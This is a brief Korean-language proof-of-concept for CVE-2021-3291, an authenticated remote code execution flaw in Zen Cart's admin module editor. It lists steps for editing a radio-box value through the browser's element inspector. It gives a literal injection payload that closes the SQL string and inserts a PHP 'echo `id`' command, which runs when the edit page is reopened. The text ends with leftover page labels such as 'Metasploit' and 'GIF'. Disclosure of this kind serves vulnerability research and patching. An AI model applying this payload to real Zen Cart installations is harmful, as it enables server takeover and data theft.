
Zen Cart의 관리자 모듈 편집에서 SQL 인젝션을 통한 인증된 원격 코드 실행 익스플로잇. CVE-2021-3291에 대한 개념 증명(PoC).
1-) 관리자로 로그인
2-) 모듈 편집 페이지를 엽니다
3-) 아무 true 라디오박스에서 요소 검사를 합니다
4-) true를 다음으로 변경: true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //
5-) 업데이트 클릭
6-) 명령을 트리거하려면 다시 편집 페이지로 이동하세요.
CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291
POC
익스플로잇
페이지 새로고침
확대

Metasploit

GIF
